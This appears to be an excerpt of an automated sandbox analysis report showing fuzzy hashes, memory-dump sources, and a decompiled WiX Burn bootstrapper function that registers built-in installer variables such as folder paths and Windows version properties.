                                                                                                                                                                  • Opcode Fuzzy Hash: fbd4795c8cad67875efc4afb993767a5f9e8bad3f0531e06cec0b6a54e32c457
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C513072E00229BBDF11AFA5EC41ADEBAB8EF48714F104127FA00B6150D7789A458BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00403D71(struct _CRITICAL_SECTION* _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				char* _v24;
                                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				intOrPtr _v36;
                                                                                                                                                                  				char* _v40;
                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                  				intOrPtr _v48;
                                                                                                                                                                  				intOrPtr _v52;
                                                                                                                                                                  				char* _v56;
                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                  				char* _v72;
                                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                                  				intOrPtr _v84;
                                                                                                                                                                  				char* _v88;
                                                                                                                                                                  				intOrPtr _v92;
                                                                                                                                                                  				intOrPtr _v96;
                                                                                                                                                                  				intOrPtr _v100;
                                                                                                                                                                  				char* _v104;
                                                                                                                                                                  				intOrPtr _v108;
                                                                                                                                                                  				intOrPtr _v112;
                                                                                                                                                                  				intOrPtr _v116;
                                                                                                                                                                  				char* _v120;
                                                                                                                                                                  				intOrPtr _v124;
                                                                                                                                                                  				intOrPtr _v128;
                                                                                                                                                                  				intOrPtr _v132;
                                                                                                                                                                  				char* _v136;
                                                                                                                                                                  				intOrPtr _v140;
                                                                                                                                                                  				intOrPtr _v144;
                                                                                                                                                                  				intOrPtr _v148;
                                                                                                                                                                  				char* _v152;
                                                                                                                                                                  				intOrPtr _v156;
                                                                                                                                                                  				intOrPtr _v160;
                                                                                                                                                                  				intOrPtr _v164;
                                                                                                                                                                  				char* _v168;
                                                                                                                                                                  				intOrPtr _v172;
                                                                                                                                                                  				intOrPtr _v176;
                                                                                                                                                                  				intOrPtr _v180;
                                                                                                                                                                  				char* _v184;
                                                                                                                                                                  				intOrPtr _v188;
                                                                                                                                                                  				intOrPtr _v192;
                                                                                                                                                                  				intOrPtr _v196;
                                                                                                                                                                  				char* _v200;
                                                                                                                                                                  				intOrPtr _v204;
                                                                                                                                                                  				intOrPtr _v208;
                                                                                                                                                                  				intOrPtr _v212;
                                                                                                                                                                  				char* _v216;
                                                                                                                                                                  				intOrPtr _v220;
                                                                                                                                                                  				intOrPtr _v224;
                                                                                                                                                                  				intOrPtr _v228;
                                                                                                                                                                  				char* _v232;
                                                                                                                                                                  				intOrPtr _v236;
                                                                                                                                                                  				intOrPtr _v240;
                                                                                                                                                                  				intOrPtr _v244;
                                                                                                                                                                  				char* _v248;
                                                                                                                                                                  				intOrPtr _v252;
                                                                                                                                                                  				intOrPtr _v256;
                                                                                                                                                                  				intOrPtr _v260;
                                                                                                                                                                  				char* _v264;
                                                                                                                                                                  				intOrPtr _v268;
                                                                                                                                                                  				intOrPtr _v272;
                                                                                                                                                                  				intOrPtr _v276;
                                                                                                                                                                  				char* _v280;
                                                                                                                                                                  				intOrPtr _v284;
                                                                                                                                                                  				intOrPtr _v288;
                                                                                                                                                                  				intOrPtr _v292;
                                                                                                                                                                  				char* _v296;
                                                                                                                                                                  				intOrPtr _v300;
                                                                                                                                                                  				intOrPtr _v304;
                                                                                                                                                                  				intOrPtr _v308;
                                                                                                                                                                  				char* _v312;
                                                                                                                                                                  				intOrPtr _v316;
                                                                                                                                                                  				intOrPtr _v320;
                                                                                                                                                                  				intOrPtr _v324;
                                                                                                                                                                  				char* _v328;
                                                                                                                                                                  				intOrPtr _v332;
                                                                                                                                                                  				intOrPtr _v336;
                                                                                                                                                                  				intOrPtr _v340;
                                                                                                                                                                  				char* _v344;
                                                                                                                                                                  				intOrPtr _v348;
                                                                                                                                                                  				intOrPtr _v352;
                                                                                                                                                                  				intOrPtr _v356;
                                                                                                                                                                  				char* _v360;
                                                                                                                                                                  				intOrPtr _v364;
                                                                                                                                                                  				intOrPtr _v368;
                                                                                                                                                                  				intOrPtr _v372;
                                                                                                                                                                  				char* _v376;
                                                                                                                                                                  				intOrPtr _v380;
                                                                                                                                                                  				intOrPtr _v384;
                                                                                                                                                                  				intOrPtr _v388;
                                                                                                                                                                  				char* _v392;
                                                                                                                                                                  				intOrPtr _v396;
                                                                                                                                                                  				intOrPtr _v400;
                                                                                                                                                                  				intOrPtr _v404;
                                                                                                                                                                  				char* _v408;
                                                                                                                                                                  				intOrPtr _v412;
                                                                                                                                                                  				intOrPtr _v416;
                                                                                                                                                                  				intOrPtr _v420;
                                                                                                                                                                  				char* _v424;
                                                                                                                                                                  				intOrPtr _v428;
                                                                                                                                                                  				intOrPtr _v432;
                                                                                                                                                                  				intOrPtr _v436;
                                                                                                                                                                  				char* _v440;
                                                                                                                                                                  				intOrPtr _v444;
                                                                                                                                                                  				intOrPtr _v448;
                                                                                                                                                                  				intOrPtr _v452;
                                                                                                                                                                  				char* _v456;
                                                                                                                                                                  				intOrPtr _v460;
                                                                                                                                                                  				intOrPtr _v464;
                                                                                                                                                                  				intOrPtr _v468;
                                                                                                                                                                  				char* _v472;
                                                                                                                                                                  				intOrPtr _v476;
                                                                                                                                                                  				intOrPtr _v480;
                                                                                                                                                                  				intOrPtr _v484;
                                                                                                                                                                  				char* _v488;
                                                                                                                                                                  				intOrPtr _v492;
                                                                                                                                                                  				intOrPtr _v496;
                                                                                                                                                                  				intOrPtr _v500;
                                                                                                                                                                  				char* _v504;
                                                                                                                                                                  				intOrPtr _v508;
                                                                                                                                                                  				intOrPtr _v512;
                                                                                                                                                                  				intOrPtr _v516;
                                                                                                                                                                  				char* _v520;
                                                                                                                                                                  				intOrPtr _v524;
                                                                                                                                                                  				intOrPtr _v528;
                                                                                                                                                                  				intOrPtr _v532;
                                                                                                                                                                  				char* _v536;
                                                                                                                                                                  				intOrPtr _v540;
                                                                                                                                                                  				intOrPtr _v544;
                                                                                                                                                                  				intOrPtr _v548;
                                                                                                                                                                  				char* _v552;
                                                                                                                                                                  				intOrPtr _v556;
                                                                                                                                                                  				intOrPtr _v560;
                                                                                                                                                                  				intOrPtr _v564;
                                                                                                                                                                  				char* _v568;
                                                                                                                                                                  				intOrPtr _v572;
                                                                                                                                                                  				intOrPtr _v576;
                                                                                                                                                                  				intOrPtr _v580;
                                                                                                                                                                  				char* _v584;
                                                                                                                                                                  				intOrPtr _v588;
                                                                                                                                                                  				intOrPtr _v592;
                                                                                                                                                                  				intOrPtr _v596;
                                                                                                                                                                  				char* _v600;
                                                                                                                                                                  				intOrPtr _v604;
                                                                                                                                                                  				intOrPtr _v608;
                                                                                                                                                                  				intOrPtr _v612;
                                                                                                                                                                  				char* _v616;
                                                                                                                                                                  				intOrPtr _v620;
                                                                                                                                                                  				intOrPtr _v624;
                                                                                                                                                                  				intOrPtr _v628;
                                                                                                                                                                  				char* _v632;
                                                                                                                                                                  				intOrPtr _v636;
                                                                                                                                                                  				intOrPtr _v640;
                                                                                                                                                                  				intOrPtr _v644;
                                                                                                                                                                  				char* _v648;
                                                                                                                                                                  				intOrPtr _v652;
                                                                                                                                                                  				intOrPtr _v656;
                                                                                                                                                                  				intOrPtr _v660;
                                                                                                                                                                  				char* _v664;
                                                                                                                                                                  				intOrPtr _v668;
                                                                                                                                                                  				intOrPtr _v672;
                                                                                                                                                                  				intOrPtr _v676;
                                                                                                                                                                  				char* _v680;
                                                                                                                                                                  				intOrPtr _v684;
                                                                                                                                                                  				intOrPtr _v688;
                                                                                                                                                                  				intOrPtr _v692;
                                                                                                                                                                  				char* _v696;
                                                                                                                                                                  				intOrPtr _v700;
                                                                                                                                                                  				intOrPtr _v704;
                                                                                                                                                                  				intOrPtr _v708;
                                                                                                                                                                  				char* _v712;
                                                                                                                                                                  				intOrPtr _v716;
                                                                                                                                                                  				intOrPtr _v720;
                                                                                                                                                                  				intOrPtr _v724;
                                                                                                                                                                  				char* _v728;
                                                                                                                                                                  				intOrPtr _v732;
                                                                                                                                                                  				intOrPtr _v736;
                                                                                                                                                                  				intOrPtr _v740;
                                                                                                                                                                  				char* _v744;
                                                                                                                                                                  				intOrPtr _v748;
                                                                                                                                                                  				intOrPtr _v752;
                                                                                                                                                                  				intOrPtr _v756;
                                                                                                                                                                  				char* _v760;
                                                                                                                                                                  				intOrPtr _v764;
                                                                                                                                                                  				intOrPtr _v768;
                                                                                                                                                                  				intOrPtr _v772;
                                                                                                                                                                  				char* _v776;
                                                                                                                                                                  				intOrPtr _v780;
                                                                                                                                                                  				intOrPtr _v784;
                                                                                                                                                                  				intOrPtr _v788;
                                                                                                                                                                  				char* _v792;
                                                                                                                                                                  				intOrPtr _v796;
                                                                                                                                                                  				intOrPtr _v800;
                                                                                                                                                                  				intOrPtr _v804;
                                                                                                                                                                  				char* _v808;
                                                                                                                                                                  				intOrPtr _v812;
                                                                                                                                                                  				intOrPtr _v816;
                                                                                                                                                                  				intOrPtr _v820;
                                                                                                                                                                  				char* _v824;
                                                                                                                                                                  				intOrPtr _v828;
                                                                                                                                                                  				intOrPtr _v832;
                                                                                                                                                                  				intOrPtr _v836;
                                                                                                                                                                  				char* _v840;
                                                                                                                                                                  				intOrPtr _v844;
                                                                                                                                                                  				intOrPtr _v848;
                                                                                                                                                                  				intOrPtr _v852;
                                                                                                                                                                  				char* _v856;
                                                                                                                                                                  				intOrPtr _v860;
                                                                                                                                                                  				intOrPtr _v864;
                                                                                                                                                                  				intOrPtr _v868;
                                                                                                                                                                  				char* _v872;
                                                                                                                                                                  				intOrPtr _v876;
                                                                                                                                                                  				intOrPtr _v880;
                                                                                                                                                                  				intOrPtr _v884;
                                                                                                                                                                  				char* _v888;
                                                                                                                                                                  				intOrPtr _v892;
                                                                                                                                                                  				intOrPtr _v896;
                                                                                                                                                                  				intOrPtr _v900;
                                                                                                                                                                  				char* _v904;
                                                                                                                                                                  				intOrPtr _v908;
                                                                                                                                                                  				char _v912;
                                                                                                                                                                  				intOrPtr _v916;
                                                                                                                                                                  				char* _v920;
                                                                                                                                                                  				struct _CRITICAL_SECTION* _v924;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t239;
                                                                                                                                                                  				struct _CRITICAL_SECTION* _t241;
                                                                                                                                                                  				intOrPtr _t242;
                                                                                                                                                                  				intOrPtr _t243;
                                                                                                                                                                  				intOrPtr _t244;
                                                                                                                                                                  				void* _t250;
                                                                                                                                                                  				intOrPtr _t255;
                                                                                                                                                                  				intOrPtr _t257;
                                                                                                                                                                  				intOrPtr _t258;
                                                                                                                                                                  				intOrPtr _t260;
                                                                                                                                                                  				intOrPtr _t264;
                                                                                                                                                                  				intOrPtr _t268;
                                                                                                                                                                  				intOrPtr* _t269;
                                                                                                                                                                  				intOrPtr _t270;
                                                                                                                                                                  				signed int _t271;
                                                                                                                                                                  
                                                                                                                                                                  				_t239 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t239 ^ _t271;
                                                                                                                                                                  				_t241 = _a4;
                                                                                                                                                                  				_v924 = _t241;
                                                                                                                                                                  				InitializeCriticalSection(_t241);
                                                                                                                                                                  				_t270 = 0;
                                                                                                                                                                  				_t242 = 0x2b;
                                                                                                                                                                  				_t257 = 6;
                                                                                                                                                                  				_v920 = L"AdminToolsFolder";
                                                                                                                                                                  				_v916 = E0040291F;
                                                                                                                                                                  				_v912 = 0x30;
                                                                                                                                                                  				_v908 = 0;
                                                                                                                                                                  				_v904 = L"AppDataFolder";
                                                                                                                                                                  				_v900 = E0040291F;
                                                                                                                                                                  				_v896 = 0x1a;
                                                                                                                                                                  				_v892 = 0;
                                                                                                                                                                  				_v888 = L"CommonAppDataFolder";
                                                                                                                                                                  				_v884 = E0040291F;
                                                                                                                                                                  				_v880 = 0x23;
                                                                                                                                                                  				_v876 = 0;
                                                                                                                                                                  				_v872 = L"CommonFiles64Folder";
                                                                                                                                                                  				_v868 = E00402E54;
                                                                                                                                                                  				_v864 = _t242;
                                                                                                                                                                  				_v860 = 0;
                                                                                                                                                                  				_v856 = L"CommonFilesFolder";
                                                                                                                                                                  				_v852 = E0040291F;
                                                                                                                                                                  				_v848 = _t242;
                                                                                                                                                                  				_v844 = 0;
                                                                                                                                                                  				_v840 = L"CommonFiles6432Folder";
                                                                                                                                                                  				_v836 = E004027E9;
                                                                                                                                                                  				_v832 = _t242;
                                                                                                                                                                  				_v828 = 0;
                                                                                                                                                                  				_v824 = L"CompatibilityMode";
                                                                                                                                                                  				_v820 = E00402BF0;
                                                                                                                                                                  				_v816 = 0xc;
                                                                                                                                                                  				_v812 = 0;
                                                                                                                                                                  				_v808 = L"Date";
                                                                                                                                                                  				_v804 = E00402986;
                                                                                                                                                                  				_v800 = 0;
                                                                                                                                                                  				_v796 = 0;
                                                                                                                                                                  				_v792 = L"ComputerName";
                                                                                                                                                                  				_v788 = E00402881;
                                                                                                                                                                  				_v784 = 0;
                                                                                                                                                                  				_v780 = 0;
                                                                                                                                                                  				_v776 = L"DesktopFolder";
                                                                                                                                                                  				_v772 = E0040291F;
                                                                                                                                                                  				_v768 = 0;
                                                                                                                                                                  				_v764 = 0;
                                                                                                                                                                  				_v760 = L"FavoritesFolder";
                                                                                                                                                                  				_v756 = E0040291F;
                                                                                                                                                                  				_v752 = _t257;
                                                                                                                                                                  				_v748 = 0;
                                                                                                                                                                  				_v744 = L"FontsFolder";
                                                                                                                                                                  				_v740 = E0040291F;
                                                                                                                                                                  				_v736 = 0x14;
                                                                                                                                                                  				_v732 = 0;
                                                                                                                                                                  				_v728 = L"InstallerName";
                                                                                                                                                                  				_v724 = E00402A9F;
                                                                                                                                                                  				_v720 = 0;
                                                                                                                                                                  				_v716 = 0;
                                                                                                                                                                  				_v712 = L"InstallerVersion";
                                                                                                                                                                  				_v708 = E00402ACC;
                                                                                                                                                                  				_v704 = 0;
                                                                                                                                                                  				_v700 = 0;
                                                                                                                                                                  				_v696 = L"LocalAppDataFolder";
                                                                                                                                                                  				_v692 = E0040291F;
                                                                                                                                                                  				_v688 = 0x1c;
                                                                                                                                                                  				_v684 = 0;
                                                                                                                                                                  				_v680 = L"LogonUser";
                                                                                                                                                                  				_v676 = E00402B28;
                                                                                                                                                                  				_v672 = 0;
                                                                                                                                                                  				_v668 = 0;
                                                                                                                                                                  				_v664 = L"MyPicturesFolder";
                                                                                                                                                                  				_v660 = E0040291F;
                                                                                                                                                                  				_t243 = 5;
                                                                                                                                                                  				_t255 = 7;
                                                                                                                                                                  				_v608 = _t257;
                                                                                                                                                                  				_t258 = 9;
                                                                                                                                                                  				_v644 = E00402BF0;
                                                                                                                                                                  				_v628 = E00402BF0;
                                                                                                                                                                  				_v612 = E00402BF0;
                                                                                                                                                                  				_v596 = E00402BF0;
                                                                                                                                                                  				_v580 = E00402BF0;
                                                                                                                                                                  				_v564 = E00402BF0;
                                                                                                                                                                  				_v548 = E00402BF0;
                                                                                                                                                                  				_v532 = E00402BF0;
                                                                                                                                                                  				_t264 = 0xb;
                                                                                                                                                                  				_v624 = _t243;
                                                                                                                                                                  				_v512 = _t243;
                                                                                                                                                                  				_t244 = 0x26;
                                                                                                                                                                  				_v480 = _t244;
                                                                                                                                                                  				_v464 = _t244;
                                                                                                                                                                  				_v452 = E004027E9;
                                                                                                                                                                  				_v448 = _t244;
                                                                                                                                                                  				_t268 = 2;
                                                                                                                                                                  				_v560 = _t258;
                                                                                                                                                                  				_v400 = _t258;
                                                                                                                                                                  				_v656 = 0x27;
                                                                                                                                                                  				_v652 = 0;
                                                                                                                                                                  				_v648 = L"NTProductType";
                                                                                                                                                                  				_v640 = 4;
                                                                                                                                                                  				_v636 = 0;
                                                                                                                                                                  				_v632 = L"NTSuiteBackOffice";
                                                                                                                                                                  				_v620 = 0;
                                                                                                                                                                  				_v616 = L"NTSuiteDataCenter";
                                                                                                                                                                  				_v604 = 0;
                                                                                                                                                                  				_v600 = L"NTSuiteEnterprise";
                                                                                                                                                                  				_v592 = E0040291F;
                                                                                                                                                                  				_v588 = 0;
                                                                                                                                                                  				_v584 = L"NTSuitePersonal";
                                                                                                                                                                  				_v576 = 8;
                                                                                                                                                                  				_v572 = 0;
                                                                                                                                                                  				_v568 = L"NTSuiteSmallBusiness";
                                                                                                                                                                  				_v556 = 0;
                                                                                                                                                                  				_v552 = L"NTSuiteSmallBusinessRestricted";
                                                                                                                                                                  				_v544 = 0xa;
                                                                                                                                                                  				_v540 = 0;
                                                                                                                                                                  				_v536 = L"NTSuiteWebServer";
                                                                                                                                                                  				_v528 = E00402BF0;
                                                                                                                                                                  				_v524 = 0;
                                                                                                                                                                  				_v520 = L"PersonalFolder";
                                                                                                                                                                  				_v516 = E0040291F;
                                                                                                                                                                  				_v508 = 0;
                                                                                                                                                                  				_v504 = L"Privileged";
                                                                                                                                                                  				_v500 = E00402DA0;
                                                                                                                                                                  				_v496 = 0;
                                                                                                                                                                  				_v492 = 0;
                                                                                                                                                                  				_v488 = L"ProgramFiles64Folder";
                                                                                                                                                                  				_v484 = E00402E54;
                                                                                                                                                                  				_v476 = 0;
                                                                                                                                                                  				_v472 = L"ProgramFilesFolder";
                                                                                                                                                                  				_v468 = E0040291F;
                                                                                                                                                                  				_v460 = 0;
                                                                                                                                                                  				_v456 = L"ProgramFiles6432Folder";
                                                                                                                                                                  				_v444 = 0;
                                                                                                                                                                  				_v440 = L"ProgramMenuFolder";
                                                                                                                                                                  				_v436 = E0040291F;
                                                                                                                                                                  				_v432 = E004027E9;
                                                                                                                                                                  				_v428 = 0;
                                                                                                                                                                  				_v424 = L"RebootPending";
                                                                                                                                                                  				_v420 = E00402DE7;
                                                                                                                                                                  				_v416 = 0;
                                                                                                                                                                  				_v412 = 0;
                                                                                                                                                                  				_v408 = L"SendToFolder";
                                                                                                                                                                  				_v404 = E0040291F;
                                                                                                                                                                  				_v396 = 0;
                                                                                                                                                                  				_v392 = L"ServicePackLevel";
                                                                                                                                                                  				_v372 = E0040291F;
                                                                                                                                                                  				_v356 = E0040291F;
                                                                                                                                                                  				_v340 = E00402EF0;
                                                                                                                                                                  				_v324 = E00402EF0;
                                                                                                                                                                  				_v368 = _t264;
                                                                                                                                                                  				_v388 = E004031B4;
                                                                                                                                                                  				_v276 = E0040291F;
                                                                                                                                                                  				_v212 = E004031B4;
                                                                                                                                                                  				_v196 = E004031B4;
                                                                                                                                                                  				_v180 = E0040291F;
                                                                                                                                                                  				_t260 = E00402EC5;
                                                                                                                                                                  				_v384 = 3;
                                                                                                                                                                  				_v380 = 0;
                                                                                                                                                                  				_v376 = L"StartMenuFolder";
                                                                                                                                                                  				_v364 = 0;
                                                                                                                                                                  				_v360 = L"StartupFolder";
                                                                                                                                                                  				_v352 = _t255;
                                                                                                                                                                  				_v348 = 0;
                                                                                                                                                                  				_v344 = L"SystemFolder";
                                                                                                                                                                  				_v336 = 0;
                                                                                                                                                                  				_v332 = 0;
                                                                                                                                                                  				_v328 = L"System64Folder";
                                                                                                                                                                  				_v320 = 1;
                                                                                                                                                                  				_v316 = 0;
                                                                                                                                                                  				_v312 = L"SystemLanguageID";
                                                                                                                                                                  				_v308 = E00402785;
                                                                                                                                                                  				_v304 = 0;
                                                                                                                                                                  				_v300 = 0;
                                                                                                                                                                  				_v296 = L"TempFolder";
                                                                                                                                                                  				_v292 = E00403017;
                                                                                                                                                                  				_v288 = 0;
                                                                                                                                                                  				_v284 = 0;
                                                                                                                                                                  				_v280 = L"TemplateFolder";
                                                                                                                                                                  				_v272 = 0x15;
                                                                                                                                                                  				_v268 = 0;
                                                                                                                                                                  				_v264 = L"TerminalServer";
                                                                                                                                                                  				_v260 = E00402BF0;
                                                                                                                                                                  				_v256 = 0xd;
                                                                                                                                                                  				_v252 = 0;
                                                                                                                                                                  				_v248 = L"UserLanguageID";
                                                                                                                                                                  				_v244 = E004027B7;
                                                                                                                                                                  				_v240 = 0;
                                                                                                                                                                  				_v236 = 0;
                                                                                                                                                                  				_v232 = L"VersionMsi";
                                                                                                                                                                  				_v228 = E004030ED;
                                                                                                                                                                  				_v224 = 0;
                                                                                                                                                                  				_v220 = 0;
                                                                                                                                                                  				_v216 = L"VersionNT";
                                                                                                                                                                  				_v208 = 1;
                                                                                                                                                                  				_v204 = 0;
                                                                                                                                                                  				_v200 = L"VersionNT64";
                                                                                                                                                                  				_v192 = _t268;
                                                                                                                                                                  				_v188 = 0;
                                                                                                                                                                  				_v184 = L"WindowsFolder";
                                                                                                                                                                  				_v176 = 0x24;
                                                                                                                                                                  				_v172 = 0;
                                                                                                                                                                  				_v168 = L"WindowsVolume";
                                                                                                                                                                  				_v164 = E0040337E;
                                                                                                                                                                  				_v160 = 0;
                                                                                                                                                                  				_v156 = 0;
                                                                                                                                                                  				_v152 = L"WixBundleAction";
                                                                                                                                                                  				_v148 = E00402BC5;
                                                                                                                                                                  				_v144 = 0;
                                                                                                                                                                  				_v140 = 0;
                                                                                                                                                                  				_v136 = L"WixBundleForcedRestartPackage";
                                                                                                                                                                  				_v132 = E00402EC5;
                                                                                                                                                                  				_v128 = 0;
                                                                                                                                                                  				_v124 = 1;
                                                                                                                                                                  				_v120 = L"WixBundleInstalled";
                                                                                                                                                                  				_v116 = E00402BC5;
                                                                                                                                                                  				_v112 = 0;
                                                                                                                                                                  				_v108 = 0;
                                                                                                                                                                  				_v104 = L"WixBundleElevated";
                                                                                                                                                                  				_v100 = E00402BC5;
                                                                                                                                                                  				_v96 = 0;
                                                                                                                                                                  				_v92 = 0;
                                                                                                                                                                  				_v88 = L"WixBundleActiveParent";
                                                                                                                                                                  				_v84 = E00402EC5;
                                                                                                                                                                  				_v80 = 0;
                                                                                                                                                                  				_v76 = 0;
                                                                                                                                                                  				_v72 = L"WixBundleProviderKey";
                                                                                                                                                                  				_v68 = E00402EC5;
                                                                                                                                                                  				_v64 = 0x43b580;
                                                                                                                                                                  				_v60 = 0;
                                                                                                                                                                  				_v56 = L"WixBundleManufacturer";
                                                                                                                                                                  				_v52 = E00402EC5;
                                                                                                                                                                  				_v48 = 0x43b580;
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v40 = L"WixBundleTag";
                                                                                                                                                                  				_v36 = E00402EC5;
                                                                                                                                                                  				_v32 = 0x43b580;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				_v24 = L"WixBundleVersion";
                                                                                                                                                                  				_v20 = E004030C2;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_t269 =  &_v912;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t250 = E00402024(_t260, _v924,  *((intOrPtr*)(_t269 - 8)),  *((intOrPtr*)(_t269 - 4)),  *_t269,  *((intOrPtr*)(_t269 + 4)));
                                                                                                                                                                  					_t256 = _t250;
                                                                                                                                                                  					if(_t250 < 0) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t270 = _t270 + 1;
                                                                                                                                                                  					_t269 = _t269 + 0x10;
                                                                                                                                                                  					if(_t270 < 0x39) {
                                                                                                                                                                  						continue;
                                                                                                                                                                  					} else {
                                                                                                                                                                  					}
                                                                                                                                                                  					L5:
                                                                                                                                                                  					return L004267AF(_t256, _v8 ^ _t271, _t269, _t270);
                                                                                                                                                                  				}
                                                                                                                                                                  				E00430A57(_t256, "Failed to add built-in variable: %ls.",  *((intOrPtr*)(_t269 - 8)));
                                                                                                                                                                  				goto L5;
                                                                                                                                                                  			}
                                                                                                                                                                  0x004040e5
                                                                                                                                                                  0x004040ef
                                                                                                                                                                  0x004040f9
                                                                                                                                                                  0x004040ff
                                                                                                                                                                  0x00404109
                                                                                                                                                                  0x00404113
                                                                                                                                                                  0x00404119
                                                                                                                                                                  0x0040411f
                                                                                                                                                                  0x00404129
                                                                                                                                                                  0x00404133
                                                                                                                                                                  0x00404139
                                                                                                                                                                  0x00404143
                                                                                                                                                                  0x0040414d
                                                                                                                                                                  0x00404153
                                                                                                                                                                  0x0040415d
                                                                                                                                                                  0x00404163
                                                                                                                                                                  0x0040416d
                                                                                                                                                                  0x00404173
                                                                                                                                                                  0x00404179
                                                                                                                                                                  0x0040417f
                                                                                                                                                                  0x00404189
                                                                                                                                                                  0x00404193
                                                                                                                                                                  0x00404199
                                                                                                                                                                  0x0040419f
                                                                                                                                                                  0x004041a9
                                                                                                                                                                  0x004041af
                                                                                                                                                                  0x004041b5
                                                                                                                                                                  0x004041c4
                                                                                                                                                                  0x004041ca
                                                                                                                                                                  0x004041d5
                                                                                                                                                                  0x004041db
                                                                                                                                                                  0x004041e6
                                                                                                                                                                  0x004041ef
                                                                                                                                                                  0x004041f5
                                                                                                                                                                  0x004041fb
                                                                                                                                                                  0x00404201
                                                                                                                                                                  0x00404207
                                                                                                                                                                  0x00404212
                                                                                                                                                                  0x00404217
                                                                                                                                                                  0x00404221
                                                                                                                                                                  0x00404227
                                                                                                                                                                  0x00404231
                                                                                                                                                                  0x00404237
                                                                                                                                                                  0x00404241
                                                                                                                                                                  0x00404247
                                                                                                                                                                  0x0040424d
                                                                                                                                                                  0x00404257
                                                                                                                                                                  0x0040425d
                                                                                                                                                                  0x00404263
                                                                                                                                                                  0x0040426d
                                                                                                                                                                  0x00404273
                                                                                                                                                                  0x00404279
                                                                                                                                                                  0x00404283
                                                                                                                                                                  0x0040428d
                                                                                                                                                                  0x00404293
                                                                                                                                                                  0x00404299
                                                                                                                                                                  0x004042a3
                                                                                                                                                                  0x004042ad
                                                                                                                                                                  0x004042b3
                                                                                                                                                                  0x004042b9
                                                                                                                                                                  0x004042c3
                                                                                                                                                                  0x004042cd
                                                                                                                                                                  0x004042d3
                                                                                                                                                                  0x004042dd
                                                                                                                                                                  0x004042e7
                                                                                                                                                                  0x004042f1
                                                                                                                                                                  0x004042f7
                                                                                                                                                                  0x00404301
                                                                                                                                                                  0x0040430b
                                                                                                                                                                  0x00404311
                                                                                                                                                                  0x00404317
                                                                                                                                                                  0x00404321
                                                                                                                                                                  0x0040432b
                                                                                                                                                                  0x00404331
                                                                                                                                                                  0x00404337
                                                                                                                                                                  0x00404341
                                                                                                                                                                  0x00404347
                                                                                                                                                                  0x0040434d
                                                                                                                                                                  0x00404357
                                                                                                                                                                  0x0040435d
                                                                                                                                                                  0x00404363
                                                                                                                                                                  0x0040436d
                                                                                                                                                                  0x00404377
                                                                                                                                                                  0x0040437d
                                                                                                                                                                  0x00404387
                                                                                                                                                                  0x00404391
                                                                                                                                                                  0x00404397
                                                                                                                                                                  0x0040439d
                                                                                                                                                                  0x004043a7
                                                                                                                                                                  0x004043ad
                                                                                                                                                                  0x004043b3
                                                                                                                                                                  0x004043b9
                                                                                                                                                                  0x004043c3
                                                                                                                                                                  0x004043c6
                                                                                                                                                                  0x004043c9
                                                                                                                                                                  0x004043cc
                                                                                                                                                                  0x004043d3
                                                                                                                                                                  0x004043d6
                                                                                                                                                                  0x004043d9
                                                                                                                                                                  0x004043dc
                                                                                                                                                                  0x004043e3
                                                                                                                                                                  0x004043e6
                                                                                                                                                                  0x004043e9
                                                                                                                                                                  0x004043f1
                                                                                                                                                                  0x004043f8
                                                                                                                                                                  0x004043fb
                                                                                                                                                                  0x004043fe
                                                                                                                                                                  0x00404401
                                                                                                                                                                  0x00404408
                                                                                                                                                                  0x0040440b
                                                                                                                                                                  0x0040440e
                                                                                                                                                                  0x00404411
                                                                                                                                                                  0x00404418
                                                                                                                                                                  0x0040441b
                                                                                                                                                                  0x0040441e
                                                                                                                                                                  0x00404421
                                                                                                                                                                  0x00404428
                                                                                                                                                                  0x0040442b
                                                                                                                                                                  0x0040442e
                                                                                                                                                                  0x00404431
                                                                                                                                                                  0x00404438
                                                                                                                                                                  0x0040443f
                                                                                                                                                                  0x00404442
                                                                                                                                                                  0x00404445
                                                                                                                                                                  0x0040444b
                                                                                                                                                                  0x0040445c
                                                                                                                                                                  0x00404461
                                                                                                                                                                  0x00404465
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404467
                                                                                                                                                                  0x00404468
                                                                                                                                                                  0x0040446e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404470
                                                                                                                                                                  0x00404483
                                                                                                                                                                  0x00404493
                                                                                                                                                                  0x00404493
                                                                                                                                                                  0x0040447b
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00401F17,00401DDF,00000000,00401E67), ref: 00403D91
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
